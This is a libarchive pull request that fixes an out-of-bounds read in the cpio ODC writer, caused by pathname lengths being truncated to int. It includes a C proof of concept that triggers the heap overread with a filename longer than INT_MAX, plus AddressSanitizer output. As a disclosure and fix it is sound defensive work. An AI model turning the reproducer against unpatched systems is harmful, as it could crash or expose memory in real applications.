### PR TITLE
cpio: Fix writer OOB read with very long filenames

### DIFF
--- a/libarchive/archive_write_set_format_cpio_odc.c
+++ b/libarchive/archive_write_set_format_cpio_odc.c
@@ -351,7 +351,12 @@ write_header(struct archive_write *a, struct archive_entry *entry)
 	else
 	    format_octal(0, h + c_rdev_offset, c_rdev_size);
 	format_octal(archive_entry_mtime(entry), h + c_mtime_offset, c_mtime_size);
-	format_octal(pathlength, h + c_namesize_offset, c_namesize_size);
+	if (format_octal((int64_t)pathlength, h + c_namesize_offset, c_namesize_size)) {
+		archive_set_error(&a->archive, ERANGE,
+		    "Filename is too long for cpio format");
+		ret_final = ARCHIVE_FAILED;
+		goto exit_write_header;
+	}
 
 	/* Non-regular files don't store bodies. */
 	if (archive_entry_filetype(entry) != AE_IFREG)

--- a/libarchive/archive_write_set_format_cpio_odc.c
+++ b/libarchive/archive_write_set_format_cpio_odc.c
@@ -277,12 +277,12 @@ write_header(struct archive_write *a, struct archive_entry *entry)
 {
 	struct cpio *cpio;
 	const char *p, *path;
-	int pathlength, ret, ret_final;
+	int ret, ret_final;
 	int64_t	ino;
 	char h[76];
 	struct archive_string_conv *sconv;
 	struct archive_entry *entry_main;
-	size_t len;
+	size_t len, pathlength;
 
 	cpio = (struct cpio *)a->format_data;
 	ret_final = ARCHIVE_OK;
@@ -320,7 +320,7 @@ write_header(struct archive_write *a, struct archive_entry *entry)
 		ret_final = ARCHIVE_WARN;
 	}
 	/* Include trailing null. */
-	pathlength = (int)len + 1;
+	pathlength = len + 1;
 
 	memset(h, 0, sizeof(h));
 	format_octal(070707, h + c_magic_offset, c_magic_size);


### PR DESCRIPTION
Writing a cpio file with very long filenames could lead to an out of boundary read. Fix this by
- using the correct data type `size_t` without casting it to `int`
- check if the filename length field could be written, which already avoids unnecessary large writes

Proof of Concept:
```
#include <archive.h>
#include <archive_entry.h>
#include <err.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
        struct archive *a;
        struct archive_entry *ae;
        char *p;

        if ((a = archive_write_new()) == NULL)
                errx(1, "archive_write_new");
        if (archive_write_set_format_cpio_odc(a) != ARCHIVE_OK)
                errx(1, "archive_write_set_format_cpio_odc");
        if (archive_write_add_filter_none(a) != ARCHIVE_OK)
                errx(1, "archive_write_add_filter_none");
        if (archive_write_open_filename(a, "poc.cpio") != ARCHIVE_OK)
                errx(1, "archive_write_open_filename");

        if ((ae = archive_entry_new()) == NULL)
                errx(1, "archive_entry_new");

        if ((p = malloc((size_t)INT_MAX + 10)) == NULL)
                errx(1, "malloc");
        memset(p, 'A', (size_t)INT_MAX + 9);
        p[(size_t)INT_MAX + 9] = '\0';

        archive_entry_set_pathname(ae, p);
        archive_entry_set_mode(ae, S_IFREG | 0664);
        archive_entry_set_size(ae, 0);
        if (archive_write_header(a, ae) != ARCHIVE_OK)
                errx(1, "archive_write_header");
        archive_entry_free(ae);

        if (archive_write_close(a) != ARCHIVE_OK)
                errx(1, "archive_write_close");
        archive_write_free(a);

        return 0;
}
```

```
=================================================================
==52642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7b6c5cffb809 at pc 0x7f6ce4a82770 bp 0x7ffd3eb01580 sp 0x7ffd3eb00d48
READ of size 10240 at 0x7b6c5cffb809 thread T0
    #0 0x7f6ce4a8276f  (/usr/lib/libasan.so.8+0x8276f) (BuildId: ee5fbab73143ab257a66a33afe0f038a4af7a74e)
    #1 0x7f6ce417d8a7 in file_write ../libarchive/archive_write_open_filename.c:232
    #2 0x7f6ce4143050 in archive_write_client_write ../libarchive/archive_write.c:455
    #3 0x7f6ce41452c5 in __archive_write_filter ../libarchive/archive_write.c:243
    #4 0x7f6ce41452c5 in __archive_write_filter ../libarchive/archive_write.c:230
    #5 0x7f6ce419d53b in write_header ../libarchive/archive_write_set_format_cpio_odc.c:394
    #6 0x7f6ce419e79a in archive_write_odc_header ../libarchive/archive_write_set_format_cpio_odc.c:272
    #7 0x7f6ce41418ca in _archive_write_header ../libarchive/archive_write.c:782
    #8 0x5578f23034d8 in main (/home/tobias/projects/libarchive/asanbuild/poc+0x24d8) (BuildId: b77c3a384b5318390b3ae689aefa3f6d725d28cc)
    #9 0x7f6ce2e27740  (/usr/lib/libc.so.6+0x27740) (BuildId: 020d6f7c33b2413f4fe10814c4729dce1387f049)
    #10 0x7f6ce2e27878 in __libc_start_main (/usr/lib/libc.so.6+0x27878) (BuildId: 020d6f7c33b2413f4fe10814c4729dce1387f049)
    #11 0x5578f23031d4 in _start (/home/tobias/projects/libarchive/asanbuild/poc+0x21d4) (BuildId: b77c3a384b5318390b3ae689aefa3f6d725d28cc)

0x7b6c5cffb809 is located 0 bytes after 2147483657-byte region [0x7b6bdcffb800,0x7b6c5cffb809)
allocated by thread T0 here:
    #0 0x7f6ce4b2b201  (/usr/lib/libasan.so.8+0x12b201) (BuildId: ee5fbab73143ab257a66a33afe0f038a4af7a74e)
    #1 0x7f6ce412014d in archive_string_ensure ../libarchive/archive_string.c:338

SUMMARY: AddressSanitizer: heap-buffer-overflow ../libarchive/archive_write_open_filename.c:232 in file_write
```